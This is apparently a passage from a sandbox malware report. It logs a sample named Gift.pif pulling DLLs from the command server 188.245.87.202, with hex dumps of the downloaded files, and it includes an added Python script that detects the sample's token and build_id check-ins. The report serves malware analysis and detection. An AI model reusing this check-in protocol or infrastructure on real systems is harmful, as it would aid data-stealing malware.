1f 01 d6 89 b5
                                                                        Data Ascii: ,0<48%8A)$


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        12 | 192.168.2.5 | 49725 | 188.245.87.202 | 443 | 748 | C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-08-05 16:56:09 UTC | 244 | OUT | GET /mozglue.dll HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:09 UTC | 260 | IN | HTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:09 GMT
                                                                        Content-Type: application/octet-stream
                                                                        Content-Length: 608080
                                                                        Connection: close
                                                                        Last-Modified: Monday, 05-Aug-2024 16:56:09 GMT
                                                                        Cache-Control: no-store, no-cache
                                                                        Accept-Ranges: bytes
                                                                        2024-08-05 16:56:09 UTC16124INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                        2024-08-05 16:56:09 UTC16384INData Raw: 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46
                                                                        Data Ascii: #H1A$P~#HbA$P~#HUVuF|FlNhFdFhFTNPF
                                                                        2024-08-05 16:56:09 UTC16384INData Raw: 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff
                                                                        Data Ascii: EPzEPWxP1`PHP$,FM1R'^_[]00L9tc<
                                                                        2024-08-05 16:56:09 UTC16384INData Raw: c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85
                                                                        Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}L
                                                                        2024-08-05 16:56:09 UTC16384INData Raw: 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b
                                                                        Data Ascii: EN1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
                                                                        2024-08-05 16:56:09 UTC16384INData Raw: ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc
                                                                        Data Ascii: H) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
                                                                        2024-08-05 16:56:09 UTC16384INData Raw: 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9
                                                                        Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4
                                                                        2024-08-05 16:56:09 UTC16384INData Raw: 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89
                                                                        Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$
                                                                        2024-08-05 16:56:09 UTC16384INData Raw: fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83
                                                                        Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
                                                                        2024-08-05 16:56:09 UTC16384INData Raw: 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0
                                                                        Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H
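
The sessions above form one exchange: repeated multipart POSTs to / on 188.245.87.202 carrying a 32-hex `token` and `build_id` (the server answers with a chunked "ok"), followed by GETs for freebl3.dll, mozglue.dll and msvcp140.dll served as application/octet-stream by the same host. The Python below is an added example, not Joe Sandbox or sample code: it rebuilds the printed prefix of a check-in body (CRLFs restored from the hex dump; the report cuts each 437-byte body at "Cont", and nothing past that point is assumed), parses the multipart fields tolerating the truncated part, triages the five sessions by destination, and checks that the first bytes of the freebl3.dll reply are a PE image rather than text. `Request`, `triage`, `checkin_fields`, `SUPPORT_DLLS` and the "check-in plus two DLLs" threshold are this example's own names and choices; the boundary shape `----` plus 20 capitals is what every POST here uses and is matched as a hint, not a rule about the family.

```python
"""Triage of the check-in POSTs and DLL pulls captured above.  Added example,
not Joe Sandbox or sample code; every input below is rebuilt from the report."""
from __future__ import annotations

import re
from dataclasses import dataclass

TOKEN = "371764cf8efc1b40dfc15a6ff874b301"        # from the capture
BUILD_ID = "dc0c9f3971cace826e9cb1916d9d3a66"     # from the capture
C2 = "188.245.87.202"
# Support DLLs the sample pulls from the C2 after check-in (sessions 11-13).
SUPPORT_DLLS = {"/freebl3.dll", "/mozglue.dll", "/msvcp140.dll"}
HEX32 = re.compile(r"^[0-9a-f]{32}$")
BOUNDARY_SHAPE = re.compile(r"^----[A-Z]{20}$")   # boundary style seen in every POST


def checkin_body(boundary: str) -> bytes:
    """Rebuild the printed prefix of a check-in body (CRLFs restored from the hex
    dump).  The report cuts the 437-byte body at 'Cont', so the last part is
    incomplete on purpose; nothing beyond that point is assumed here."""
    d = b"--" + boundary.encode()
    return (d + b'\r\nContent-Disposition: form-data; name="token"\r\n\r\n'
            + TOKEN.encode() + b"\r\n" + d
            + b'\r\nContent-Disposition: form-data; name="build_id"\r\n\r\n'
            + BUILD_ID.encode() + b"\r\n" + d + b"\r\nCont")


def parse_multipart(body: bytes, boundary: str) -> dict[str, bytes]:
    """name -> value for every complete part; a cut-off trailing part is skipped
    rather than raising, which is what a sandbox excerpt or IDS capture needs."""
    fields: dict[str, bytes] = {}
    for part in body.split(b"--" + boundary.encode()):
        head, sep, value = part.partition(b"\r\n\r\n")
        if not sep:                       # preamble, epilogue or truncated part
            continue
        m = re.search(rb'name="([^"]+)"', head)
        if m:
            fields[m.group(1).decode()] = value.rstrip(b"\r\n")
    return fields


@dataclass
class Request:
    session: int
    dst: str
    method: str
    path: str
    content_type: str = ""
    body: bytes = b""


def checkin_fields(req: Request) -> dict[str, bytes] | None:
    """Return the parsed fields if req looks like the check-in above, else None."""
    if req.method != "POST" or req.path != "/":
        return None
    m = re.search(r"boundary=(\S+)", req.content_type)
    if not m or not BOUNDARY_SHAPE.match(m.group(1)):
        return None
    f = parse_multipart(req.body, m.group(1))
    ok = all(HEX32.match(f.get(k, b"").decode("ascii", "replace")) for k in ("token", "build_id"))
    return f if ok else None


def triage(requests: list[Request]) -> dict[str, dict]:
    """Per destination: check-in sessions, DLLs served and build_ids seen.  A host
    is flagged when a check-in is followed by at least two of the support DLLs."""
    hosts: dict[str, dict] = {}
    for r in requests:
        h = hosts.setdefault(r.dst, {"checkins": [], "dlls": [], "build_ids": set()})
        f = checkin_fields(r)
        if f is not None:
            h["checkins"].append(r.session)
            h["build_ids"].add(f["build_id"].decode())
        elif r.method == "GET" and r.path.lower() in SUPPORT_DLLS:
            h["dlls"].append(r.path)
    for h in hosts.values():
        h["flagged"] = bool(h["checkins"]) and len(set(h["dlls"])) >= 2
    return hosts


def pe_signature_offset(data: bytes) -> int | None:
    """e_lfanew if data starts a PE image (MZ, then 'PE\\0\\0' at e_lfanew), else
    None.  Enough to tell an octet-stream DLL drop from the 'ok' text reply."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return e_lfanew if data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00" else None


def freebl3_head() -> bytes:
    """First 0x7E bytes of the freebl3.dll response, rebuilt from the hex dump."""
    h = bytearray(b"MZx\x00\x01\x00\x00\x00\x04\x00" + b"\x00" * 54)
    h[0x18] = 0x40
    h[0x3C:0x40] = (0x78).to_bytes(4, "little")           # e_lfanew
    h += b"\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21"
    h += b"This program cannot be run in DOS mode.$\x00\x00"
    h += b"PE\x00\x00\x4c\x01"                             # COFF header, i386
    return bytes(h)


def captured_requests() -> list[Request]:
    """Sessions 9-13 as listed in the report (boundaries copied from the headers)."""
    ct = "multipart/form-data; boundary="
    b9, b10 = "----HJJEHJJKJEGHJJKEBFBG", "----AFHDGDGIIDGCFIDHDHDH"
    return [
        Request(9, C2, "POST", "/", ct + b9, checkin_body(b9)),
        Request(10, C2, "POST", "/", ct + b10, checkin_body(b10)),
        Request(11, C2, "GET", "/freebl3.dll"),
        Request(12, C2, "GET", "/mozglue.dll"),
        Request(13, C2, "GET", "/msvcp140.dll"),
    ]


if __name__ == "__main__":
    for host, evidence in triage(captured_requests()).items():
        print(host, evidence)
    print("freebl3.dll e_lfanew:", hex(pe_signature_offset(freebl3_head())))
```

In a real deployment feed `triage` the reassembled streams rather than the report's truncated excerpts, and treat the YaBrowser User-Agent as a correlation hint only: it is trivial for the operator to change, whereas the field names, the 32-hex values and the DLL set are what the payload needs to work.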


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        13 | 192.168.2.5 | 49726 | 188.245.87.202 | 443 | 748 | C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-08-05 16:56:11 UTC | 245 | OUT | GET /msvcp140.dll HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:11 UTC | 260 | IN | HTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:11 GMT
                                                                        Content-Type: application/octet-stream
                                                                        Content-Length: 450024
                                                                        Connection: close
                                                                        Last-Modified: Monday, 05-Aug-2024 16:56:11 GMT
                                                                        Cache-Control: no-store, no-cache
                                                                        Accept-Ranges: bytes
                                                                        2024-08-05 16:56:11 UTC16124INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                        2024-08-05 16:56:11 UTC16384INData Raw: 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72
                                                                        Data Ascii: -bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr
                                                                        2024-08-05 16:56:11 UTC16384INData Raw: 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff
                                                                        Data Ascii: x{|L@DX}0}}M@4}0}}4M@tXM}0}}XM
                                                                        2024-08-05 16:56:11 UTC16384INData Raw: 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd
                                                                        Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]E
                                                                        2024-08-05 16:56:11 UTC16384INData Raw: 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0
                                                                        Data Ascii: atAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
                                                                        2024-08-05 16:56:11 UTC16384INData Raw: 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57
                                                                        Data Ascii: AUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSW
